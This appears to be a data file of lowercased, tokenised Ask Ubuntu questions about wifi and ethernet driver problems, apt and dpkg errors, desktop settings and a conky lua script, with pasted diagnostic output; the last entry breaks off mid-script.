266880	wifi randomly connects and ui does not respond	i have trouble connecting with my wifi at work . here are the symptoms : when i connect , it usually succeeds ( about 75 % of the time ) . when i am connected , the connection stays online for about 15min to 45min , and then drops for a few minutes , sometimes more , and it repeats . when i am disconnected , the signal bar is at full ( whereas when i am connected i have 3/4 bars . most of the time i can not control the wifi ui ( in the wifi dropdown , clicking disconnect does nothing appart from closing the menu , selecting another network does nothing , and the '' other network '' submenu is empty and displays a tiny box . some networks are more unstable than others i can not try to plug in ethernet as it 's not available at work . at home , i sometimes have this problem , but it 's very rare ( something like 5 % of the time ) at home , i experience similar problems when connecting with ethernet . so i guess there is a problem with my ethernet/wifi driver , but i do n't know how to trouleshoot that on ubuntu . i previously had a windows 7 os on this machine , and i never had such issues . no one else is experiencing such issues at work . my system is up to date ( update manager says that there are no updates to install ) my os : ubuntu 12.04 lts , 32-bit hardware : samsung series 9 15inch , np900x4c i have took the habit of working with a connection that randomly drops , but every so often it breaks for longer when i really need it . so i 'll try to fix it . can you walk through some debbuging , as do n't know how to do it on this system ? maybe that helps : $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : e8:03:9a : ab : a8:69 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off - device : wlan0 [ wifi_neuilly_lab ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : c4:85:08:0c:41:3a capabilities : speed : 6 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) freewifi_secure : infra , 62:98:5c : c9:44 : f6 , freq 2462 mhz , rate 54 mb/s , strength 49 wpa enterprise freeboxf2i : infra , 62:98:5c : c9:44 : f4 , freq 2462 mhz , rate 54 mb/s , strength 47 wpa freewifi_secure : infra , d2:34:1a:95:65 : c2 , freq 2462 mhz , rate 54 mb/s , strength 30 wpa enterprise freeboxelyor : infra , d2:34:1a:95:65 : c0 , freq 2462 mhz , rate 54 mb/s , strength 35 wep freewifi : infra , 62:98:5c : c9:44 : f5 , freq 2462 mhz , rate 54 mb/s , strength 49 freewifi : infra , d2:34:1a:95:65 : c1 , freq 2462 mhz , rate 54 mb/s , strength 35 wifi_neuilly_ville : infra , 00:1a:1e:08:4a:60 , freq 2437 mhz , rate 54 mb/s , strength 54 wpa2 enterprise wifi_neuilly_lab : infra , 00:1a:1e:08:4a:61 , freq 2437 mhz , rate 54 mb/s , strength 52 wifi_neuilly_lab : infra , 00:1a:1e:0a:78:61 , freq 2437 mhz , rate 54 mb/s , strength 70 alcyanesas : infra , 00:1b:2f:00:7d : ac , freq 2472 mhz , rate 54 mb/s , strength 40 wpa wpa2 wifi_neuilly_ville : infra , 00:1a:1e:0a:78:60 , freq 2437 mhz , rate 54 mb/s , strength 80 wpa2 enterprise wifi_neuilly_lab : infra , 00:1a:1e:08:44 : a1 , freq 2462 mhz , rate 54 mb/s , strength 27 default : infra , 00:50:7f : ac:31:70 , freq 2412 mhz , rate 54 mb/s , strength 35 wpa wifi_neuilly_ville : infra , 00:1a:1e:08:44 : a0 , freq 2462 mhz , rate 54 mb/s , strength 32 wpa2 enterprise ief2i : infra , 00:50:7f : ac:31:71 , freq 2412 mhz , rate 54 mb/s , strength 37 wpa2 *wifi_neuilly_lab : infra , 00:1a:1e:0a:78:69 , freq 5700 mhz , rate 54 mb/s , strength 77 wifi_neuilly_ville : infra , 00:1a:1e : fd:5b:20 , freq 2412 mhz , rate 54 mb/s , strength 40 wpa2 enterprise wifi_neuilly_ville : infra , 00:1a:1e:08:4a:68 , freq 5500 mhz , rate 54 mb/s , strength 39 wpa2 enterprise wifi_neuilly_lab : infra , 00:1a:1e : fd:5b:21 , freq 2412 mhz , rate 54 mb/s , strength 37 wifi_neuilly_lab : infra , 00:1a:1e:08:4a:69 , freq 5500 mhz , rate 54 mb/s , strength 37 neuf_fb60 : infra , 00:25:15:53 : fb:64 , freq 2462 mhz , rate 54 mb/s , strength 20 wpa sfr wifi public : infra , b2:25:15:53 : fb:65 , freq 2462 mhz , rate 54 mb/s , strength 30 wifi_neuilly_ville : infra , 00:1a:1e : fd:5b:28 , freq 5240 mhz , rate 54 mb/s , strength 42 wpa2 enterprise wifi_neuilly_lab : infra , 00:1a:1e : fd:5b:29 , freq 5240 mhz , rate 54 mb/s , strength 42 ipv4 settings : address : 172.20.2.26 prefix : 24 ( 255.255.255.0 ) gateway : 172.20.2.254 dns : 172.20.2.254
266882	ca n't connect to wifi with ubuntu 12.10 on dell studio 15	at first i installed 32bit ubuntu 12.10 & struggled much setting the wifi by help of so many answer here then i thought to install 64bit as my system is of 64bit . at the installation time itself i could n't find any wifi name listed & i connect through wire . though i have 3 wifi running here ... i am not able to see the enable wireless in checking condition or i cant find any driver for wifi in additional drivers tab in software sources . what can be the problem ? is this laptop does n't work for wifi with ubuntu ? i do n't have exp with ubuntu for any troubleshooting though i use for around 1 year.. edited content -- result of lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 18 ) 00:01.0 pci bridge [ 0604 ] : intel corporation core processor pci express x16 root port [ 8086:0045 ] ( rev 18 ) 00:16.0 communication controller [ 0780 ] : intel corporation 5 series/3400 series chipset heci controller [ 8086:3b64 ] ( rev 06 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 06 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 06 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 2 [ 8086:3b44 ] ( rev 06 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 4 [ 8086:3b48 ] ( rev 06 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 5 [ 8086:3b4a ] ( rev 06 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 6 [ 8086:3b4c ] ( rev 06 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 06 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a6 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b09 ] ( rev 06 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 4 port sata ahci controller [ 8086:3b29 ] ( rev 06 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 06 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 06 ) 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] [ 1002:68e0 ] 02:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati cedar hdmi audio [ radeon hd 5400/6300 series ] [ 1002 : aa68 ] 04:00.0 network controller [ 0280 ] : intel corporation wifi link 5100 [ 8086:4232 ] 07:00.0 sd host controller [ 0805 ] : ricoh co ltd mmc/sd host controller [ 1180 : e822 ] ( rev 01 ) 07:00.1 system peripheral [ 0880 ] : ricoh co ltd r5u2xx ( r5u230 / r5u231 / r5u241 ) [ memory stick host controller ] [ 1180 : e230 ] ( rev 01 ) 07:00.2 system peripheral [ 0880 ] : ricoh co ltd pcie xd-picture card controller [ 1180 : e852 ] ( rev 01 ) 07:00.3 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 pcie ieee 1394 controller [ 1180 : e832 ] ( rev 01 ) 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 05 ) ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 05 ) ff:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 05 ) ff:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 05 ) ff:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 05 ) ff:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 05 ) result of sudo lshw -c network *-network disabled description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 00:24 : d6:43 : c0:58 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-17-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : f0500000-f0501fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 03 serial : b8 : ac:6f:68:08:6d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=192.168.1.3 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:5000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff memory : f0420000-f043ffff result of rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes thanks
266885	can not find eth0 when first boot machine , it 's ok when reboot the system , help !	some commad 's results are following : spci -k|grep -i -a2 net 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 06 ) subsystem : asustek computer inc. p8p67 deluxe motherboard kernel modules : e1000e ifconfig -a lo link encap : 本地环回 inet 地址:127.0.0.1 掩码:255.0.0.0 inet6 地址 : : :1/128 scope : host up loopback running mtu:16436 跃点数:1 接收数据包:32 错误:0 丢弃:0 过载:0 帧数:0 发送数据包:32 错误:0 丢弃:0 过载:0 载波:0 碰撞:0 发送队列长度:0 接收字节:2624 ( 2.6 kb ) 发送字节:2624 ( 2.6 kb ) lsmod | grep e1000e e1000e 156693 0 cat /etc/network/interfaces auto lo iface lo inet loopback ps : the motherboard is asus sabertooth x79 , and the update the nework adapter does not work ! thanks translated : local loopback inet addr : 127.0.0.1 mask : 255.0.0.0 inet6 addr : : : 1/128 scope : host up loopback running mtu:16436 metric : 1 rx packets : 32 errors : 0 dropped : 0 overruns : 0 frame : 0 tx packets : 32 errors : 0 dropped : 0 overruns : 0 carrier : 0 collisions : 0 send queue length : 0 received bytes : 2624 ( 2.6 kb ) sent bytes : 2624 ( 2.6 kb ) grep -i `` network '' syslog | less mar 13 19:42:55 zenm kernel : [ 2.247188 ] e1000e : intel ( r ) pro/1000 network driver - 1.5.1-k mar 13 19:42:55 zenm kernel : [ 3.849703 ] type=1400 audit ( 1363174975.359:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1034 comm= '' apparmor_parser '' mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > networkmanager ( version 0.9.4.0 ) is starting ... mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > read config file /etc/networkmanager/networkmanager.conf mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > vpn : loaded org.freedesktop.networkmanager.pptp mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > dns : loaded plugin dnsmasq mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : init ! mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : update_system_hostname mar 13 19:42:55 zenm networkmanager [ 1661 ] : scpluginifupdown : management mode : managed mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : end _init . mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : ( 8946480 ) ... get_connections . mar 13 19:42:55 zenm networkmanager [ 1661 ] : scplugin-ifupdown : ( 8946480 ) connections count : 0 mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > modem-manager is now available mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > wifi enabled by radio killswitch ; enabled by state file mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > wwan enabled by radio killswitch ; enabled by state file mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > wimax enabled by radio killswitch ; enabled by state file mar 13 19:42:55 zenm networkmanager [ 1661 ] : < info > networking is enabled by state file mar 13 19:42:55 zenm kernel : [ 4.325495 ] type=1400 audit ( 1363174975.835:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1872 comm= '' apparmor_parse zenk @ zenm : /var/log $ dmesg | grep e100 [ 0.000000 ] efi : mem102 : type=4 , attr=0xf , range= [ 0x00000000c0346000-0x00000000c03e1000 ) ( 0mb ) [ 0.000000 ] efi : mem103 : type=7 , attr=0xf , range= [ 0x00000000c03e1000-0x00000000c03e4000 ) ( 0mb ) [ 2.247188 ] e1000e : intel ( r ) pro/1000 network driver - 1.5.1-k [ 2.247190 ] e1000e : copyright ( c ) 1999 - 2011 intel corporation . [ 2.247212 ] e1000e 0000:00:19.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 2.247220 ] e1000e 0000:00:19.0 : setting latency timer to 64 [ 2.247312 ] e1000e 0000:00:19.0 : irq 91 for msi/msi-x [ 3.292921 ] e1000e 0000:00:19.0 : pci int a disabled [ 3.292926 ] e1000e : probe of 0000:00:19.0 failed with error -3 file : /etc/udev/rules.d/70-persistent-net.rule content followed : # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:19.0 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 10 : bf:48 : e3:94:54 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' thx ! ! !
266889	how to edit sda1 file from ubuntu live cd	the file is /etc/inittab and the sda1 partition has been mounted . however , when i open the file in a text editor it is in read-only format . how do i make it writable from my ubuntu 10 live cd ?
266892	how to stop reordering of the same kind multiple preview windows in task switching ?	when using task switching in the default graphical mode of ubuntu 12.04 , if they are multiple windows of the same kind , eg . multiple terminal windows , you can see them all together and select which one you want . my problem is that the order of these windows is constantly changed . it follows the `` last used '' order . i want them in a fix order always ; how can i do it ?
266894	managing software sources	i 'm using lubuntu 12.04 . i can not add or remove repositories neither by using software sources menu item ( which usually crashes ) nor by using synaptic package manager via settings > repositories option . this is possibly due to having installed 'debian package search ' from *buntu-software-center , after which i ran sudo apt-file update . should i run sudo apt-file purge ? this sounds drastic ! i can manage repositories via sudo add-apt-repository .
266899	remove settings access for students	running ubuntu 12 on a class set of netbooks and looking to block settings access to the standard user ( student ) any suggestions ? thanks ,
266907	vstfpd and many accounts creation : is there a howto ?	i 've been googling around and did n't find valuable answer . i have 98 students . i want to create , for each student a directory where they can upload their own files . unless i 'm wrong , it seems i 'll have to : create a student account change its password to a strong one do this again 98 times ! i would like : 1 - to avoid if possible creating accounts i.e . just configuring vsftp properly and avoid useradd ( = avoid the step # 6 of this tutorial ) 2 - find a way to change all those students passwords to strong ones , ( and of course be able to print them to mail them individually ) .
266917	apt-get problem . download stops [ 12.04 ]	when i apt-get update or install a software with apt-get install application . it works fine for few second then the download freezes . same with ubuntu software center . the download stops after 3 seconds , sometimes in middle . i do n't know what 's the problem .
266921	recovery mode - nothing is done	i 'm very new in ubuntu , so any help will be appreciated . i 've tried to enter to recovery mode and to fix my files system . i got the message below : continuing will remount your / fillesystem in read/write mode and mount any other filesystem filesystem defined in /ect/fstab . do you wish to continue ? i clicked yes , but then - nothing is done ! i saw no process status ... what do i have to do ? thanks !
266922	updates `` done '' but not ending	i just installed 12.10 with many headaches , and as soon as i got it up and running i ran the update utility through apt-get and proceeded to upgrade . along the way , though , it got to what appeared to be the end , and said `` done , '' but it did n't finish , meaning it did n't return to command input . so i tried closing it and restarting , and now ubuntu tells me it has internal errors , and trying to run apt-get update again tells me this : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so i run the command and this happens : sudo dpkg -- configure -a setting up memtest86+ ( 4.20-1.1ubuntu2.1 ) ... generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /memtest86+.bin grub-probe : error : can not find a grub drive for /dev/sdd2 . check your device.map . found windows 7 ( loader ) on /dev/sdb1 done and i have the same problem . how can i get my updates to work properly ?
266923	how do i get the broadcom 4312 driver working at boot ?	i 've done some homework , and gotten my bcm4312 working , but not automated . i can find posts like these that describe how to get it going and connecting to networks , and i can add the wl driver to /etc/modules to have it load at boot . however , the system still wo n't find the driver , and hangs for an extra 2 minutes on startup . when i can finally get in , i can see that the module is loaded , but i have to restart network-manager to get the thing working like it should . it would seem that i 'm missing a step to get this thing fully-automatic , but i ca n't figure what that would be .
266934	need help fixing `` e : the method driver /usr/lib/apt/methods/htp could not be found . ''	i 've tried and tried , but ca n't seem to find anything that works . i also see that i have no sources.list , help with both would be nice and probably necessary
266937	print tall pdf of image over several pages	how can i print a pdf of a tall image over several pages ? the only solution i have seen is posterazor but that does n't load pdfs . i tried just using convert to convert the pdf to png but that loses a lot of resolution . pdftoppm -png file.pdf prefix at least preserves the resolution and then i can load it into posterazor . is there a nicer way of doing this as my method is too slow to do on lots of files .
266940	shortcut keys to create empty text document in nautilus ?	in nautilus there is a shortcut key to create a new folder witch is ctrl + shift + n. is there such thing to create empty text document ?
266941	acroread save settings	how can i get acroread to remember the printing settings i chosse ? in particular , i set double sided printing each time and it forgets it next time .
266942	ubuntu 12.04 dual monitor `` unknown monitor '' problem	i have a problem with my monitors , one of them is detected as samsung electric company 19 '' , and another is unknown and i cant set resolution for it higher then 1024x768 .
266947	will ios 6.1.2 work with ubuntu 12.10 ?	i am slowly adopting ubuntu as my primary os , and open source software for my applications . libre office is fine for me , gimp will take a steep learning curve to replace photoshop , tax act has an online version that imports last year 's win desptop tax filing , thunderbird is great , chromium easily replaces chrome , there are others with which i 've had marginal success . i am pretty stumped by my iphone , icloud synch for pictures , and transfering music . i 'm keeping my win 7 installation in tact for just a few applications while i learn and adopt to linux / ubuntu . is there a relatively straight forward method for my iphone 4 ( ios 6.1.2 ) to work with my desktop running ubuntu 12.10 - gnome session fallback ?
266953	replacing dots ( . ) in sed	edit : after using cat -a myfile it seems problem that those spaces are not spaces , but m-bm- special character . using any symbol . as oli suggested for search is not good idea as there is risk some other characters will be removed . so actual question is - does anyone have an idea how to remove m-bm- special character without risking losing other characters ? i found an answer : how to remove special 'm-bm- ' character with sed i have a string of text : '' . . . '' that is space dot space dot space dot i am trying to replace all occurence of this string in text file to '' ... '' that is dot dot dot i was trying to do with sed : sed -r 's : \s\.\s\.\s\. : ... : g ' -i sed-dots unfortunately , it does not change input file even a bit . file : https : //www.dropbox.com/s/46zmiruy3ln85a1/sed-dots when i try to do replace same string in text editor ( i use geany ) it is found and replaced properly . only reason i can think of is that some ( or all ) of those spaces are not really spaces , but some special character . does anyone have idea how to find and replace that string with sed ( or any other command line tool ) ? please test your idea on my file , as problem is not as obvious as it might seem to be - this is why i asked about it .
266955	how can i install ruby 1.8.7 ?	i am not ruby guy , but i have good experience with apache and php , but i find it really difficult to setup ruby 1.8.7 , cause i find a lot of ways to do the same and i am pretty much confused . i want to install open source project management system fedena in ubuntu 12.10 which required ruby 1.8.7 to run .
266962	lenovo x200s volume buttons stopped working on ubuntu 12.04	i have lenovo x200s and i have been using ubuntu on it for several years now , it is running ubuntu 12.04 since it was released in april 2012 . everything was fine until a week or so ago volume buttons stopped working correctly . i think that this error appeared after i ran updates for precise , but i am not sure . previously i was able to adjust sound output volume and ubuntu was showing the output volume change on upper right corner , under the sound icon , everything was working fine . the behavior i am getting now is : mute button works as expected - it turns off any sound . pressing any of volume buttons actually turns the sound on , but the volume will not change as i press any of those buttons repeatedly . pressing mute button and any of volume-up or volume-down buttons will turn the sound on and off , which means that physical buttons are working correctly . when i turn the sound on and i hear the sound of some youtube videos or whatever , the sound volume icon on top right corner of the screen still shows as if it was muted and it does not allow me to adjust the volume with that slider .
266965	how can i identify the name of the last played xscreensaver ?	is there a way to identify the name of which screensaver was last playing an xscreensaver session ? is there a log or of which screensaver played last in xscreensaver , in a scriptfile or on the system somewhere ? if , for example , you have it set to cycle or random ?
266968	problems runnung virtualbox in ubuntu 12.10	i am trying to start a vm using virtualbox , however i get the following errors . i have read many pages on this error ( some on this forum ) but none of the suggested fixes i have found seem to work . during install , whether using apt-get or a downloaded .deb i get install errors . i have tried installing virtualbox 4.1 and 4.2 with the same results . some suggestions i read sat to update the headers , where i get more errors . i must have some component or other missing from my system that virtualbox does not like and dependencies that are not getting resolved : ( are there any other suggestions ?
266969	insert text instead of icon in an indicator application	i want to develop an indicator app using mono c # . i want to display text instead of icons in the indicator , how can i do it ?
266970	how to open and place a new window in another workspace automatically under unity ?	the basic idea is like tiling window manager with a fixed identical grid system . i do n't want windows piled up in a same desktop ( workspace ) . we can have a huge virtual desktop like setting up 4x4 ( =16 ) workspaces , and place a new window in each workspace every time when the window launchs . using unity-expo , it behaves like zoomed tiled windows/desktop . if there is a vacant workspace , newly launched window is pushed there , and if workspaces are full , it piled up on some already used workspace , etc . of course , i know there is the unity scalewindows/windowpicker , but it 's simply a picker or expose of piled-up windows , and they appear very differently in the scaled level and location each time depending on situations . anyone knows the way to achieve this , or any plugin available ? thanks .
266973	creating wifi miniport in ubuntu 12.10 to connect android phones	i 'm from chennai , india . i have a usb dongle to connect the internet so how can i share this connection through the wifi . i used the wifi hotspot but i was not able to even detect it from my android phone . please help . thanks in advance
266974	why does the bluetooth indicator not show ?	ubuntu 12.10 64 bit $ psg blue simon 2852 2713 0 15:15 ? 00:00:00 bluetooth-applet root 4143 1 0 15:17 ? 00:00:00 /usr/sbin/bluetoothd $ gsettings get com.canonical.indicator.bluetooth visible true $ rfkill unblock bluetooth ca n't open rfkill control device : no such file or directory $ rfkill list all ca n't open rfkill control device : no such file or directory $ dmesg | grep blue < nothing > i use a usb bluetooth dongle . my pc have n't bluetooth integrated . i can enable bluetooth and pair one headset ( like it shows the screenshot ) . but the bluetooth indicator is n't showed . what 's the problem ?
266975	( please ) conky rings does n't work `` conky : llua_do_call : function conky_clock_rings execution failed : attempt to call a nil value ''	i will start by saying that i configured a conky file and made it work , but when i added lua rings it ran without having to restart , but once i restarted the rings would n't start up , i got the error message in the title , here is my conky script background yes use_xft yes xftfont 123 : size=7 xftalpha 0.1 update_interval 0.5 total_run_times 0 own_window yes own_window_type normal own_window_transparent yes own_window_hints undecorated , sticky , skip_taskbar , skip_pager , below double_buffer yes minimum_size 180 500 maximum_width 800 draw_shades no format_human_readable yes draw_outline no draw_borders no draw_graph_borders no default_color gray default_shade_color red default_outline_color green alignment top_left gap_x 50 gap_y 0 no_buffers no uppercase no cpu_avg_samples 4 cpu_avg_samples 3 cpu_avg_samples 2 net_avg_samples 1 override_utf8_locale yes use_spacer yes text_buffer_size 25 # lua load # lua_load ~/.lua/scripts/clock_rings.lua lua_draw_hook_pre clock_rings text $ { font openlogos : size=20 } the $ { font arial : size=20 } $ { color tan1 } killing $ { color ivory } os $ { font openlogos : size=20 } $ { color slate grey } $ { time % a , } $ { color } $ { time % e % b % g } $ { color slate grey } $ { time % z , } $ { color } $ { time % h : % m : % s } $ { voffset -90 } $ { color dimgray } $ { font } $ { font arial : bold : size=10 } $ { color tan1 } system $ { color darkslategray } $ { hr 2 } $ font $ { color dimgray } $ sysname $ kernel $ alignr $ machine intel pentium d $ alignr $ { freq_g cpu0 } ghz uptime $ alignr $ { uptime } file system $ alignr $ { fs_type } $ { font arial : bold : size=10 } $ { color tan2 } network $ { color darkslategray } $ { hr 2 } strength : $ { wireless_link_qual_perc wlan0 } % $ alignr $ font $ { color dimgray } ip on wlan0 $ alignr $ { addr wlan0 } down $ alignr $ { downspeed wlan0 } up $ alignr $ { upspeed wlan0 } have : $ alignr $ { totaldown wlan0 } given : $ alignr $ { totalup wlan0 } $ { image /home/froylan/pictures/umbrella_lua.png -s 319x249 -p -70,475 } $ { voffset 900 } $ { offset 250 } and here is my lua script -- [ [ clock rings by linux mint ( 2011 ) reedited by despot77 this script draws percentage meters as rings , and also draws clock hands if you want ! it is fully customisable ; all options are described in the script . this script is based off a combination of my clock.lua script and my rings.lua script . important : if you are using the 'cpu ' function , it will cause a segmentation fault if it tries to draw a ring straight away . the if statement on line 145 uses a delay to make sure that this does n't happen . it calculates the length of the delay by the number of updates since conky started . generally , a value of 5s is long enough , so if you update conky every 1s , use update_num > 5 in that if statement ( the default ) . if you only update conky every 2s , you should change it to update_num > 3 ; conversely if you update conky every 0.5s , you should use update_num > 10 . also , if you change your conky , is it best to use `` killall conky ; conky '' to update it , otherwise the update_num will not be reset and you will get an error . to call this script in conky , use the following ( assuming that you save this script to ~/scripts/rings.lua ) : lua_load ~/scripts/clock_rings.lua lua_draw_hook_pre clock_rings changelog : + v1.0 -- original release ( 30.09.2009 ) v1.1p -- jpope edit londonali1010 ( 05.10.2009 ) *v 2011mint -- reedit despot77 ( 18.02.2011 ) ] ] settings_table = { { -- edit this table to customise your rings . -- you can create more rings simply by adding more elements to settings_table . -- `` name '' is the type of stat to display ; you can choose from 'cpu ' , 'memperc ' , 'fs_used_perc ' , 'battery_used_perc ' . name='time ' , -- `` arg '' is the argument to the stat type , e.g . if in conky you would write $ { cpu cpu0 } , 'cpu0 ' would be the argument . if you would not use an argument in the conky variable , use '' . arg= ' % i. % m ' , -- `` max '' is the maximum value of the ring . if the conky variable outputs a percentage , use 100. max=12 , -- `` bg_colour '' is the colour of the base ring . bg_colour=0xffffff , -- `` bg_alpha '' is the alpha value of the base ring . bg_alpha=0.1 , -- `` fg_colour '' is the colour of the indicator part of the ring . fg_colour=0xff2200 , -- `` fg_alpha '' is the alpha value of the indicator part of the ring . fg_alpha=10 , -- `` x '' and `` y '' are the x and y coordinates of the centre of the ring , relative to the top left corner of the conky window . x=120 , y=600 , -- `` radius '' is the radius of the ring . radius=46 , -- `` thickness '' is the thickness of the ring , centred around the radius . thickness=5 , -- `` start_angle '' is the starting angle of the ring , in degrees , clockwise from top . value can be either positive or negative . start_angle= , -- `` end_angle '' is the ending angle of the ring , in degrees , clockwise from top . value can be either positive or negative , but must be larger than start_angle . end_angle=360 } , { name='time ' , arg= ' % m. % s ' , max=60 , bg_colour=0xffffff , bg_alpha=0.1 , fg_colour=0xff2200 , fg_alpha=10 , x=120 , y=600 , radius=56 , thickness=5 , start_angle=0 , end_angle=360 } , { name='time ' , arg= ' % s ' , max=60 , bg_colour=0xffffff , bg_alpha=0.1 , fg_colour=0xff2200 , fg_alpha=10 , x=120 , y=600 , radius=62 , thickness=5 , start_angle=0 , end_angle=360 } , { name='cpu ' , arg='cpu0 ' , max=100 , bg_colour=0xffffff , bg_alpha=0.1 , fg_colour=0xff6600 , fg_alpha=1 , x=120 , y=600 , radius=95 , thickness=5 , start_angle=0 , end_angle=360 } , { name='cpu ' , arg='cpu1 ' , max=100 , bg_colour=0xffffff , bg_alpha=0.1 , fg_colour=0xff6600 , fg_alpha=10 , x=120 , y=600 , radius=77 , thickness=5 , start_angle=49 , end_angle=129 } , { name='cpu ' , arg='cpu2 ' , max=100 , bg_colour=0xffffff , bg_alpha=0.3 , fg_colour=0xff6600 , fg_alpha=10 , x=120 , y=600 , radius=77 , thickness=5 , start_angle=138 , end_angle=223 } , { name='cpu ' , arg='cpu3 ' , max=100 , bg_colour=0xffffff , bg_alpha=0.1 , fg_colour=0xff6600 , fg_alpha=10 , x=120 , y=600 , radius=77 , thickness=5 , start_angle=231 , end_angle=311 } , { name='cpu ' , arg='cpu4 ' , max=100 , bg_colour=0xffffff , bg_alpha=0.1 , fg_colour=0xff6600 , fg_alpha=10 , x=120 , y=600 , radius=77 , thickness=5 , 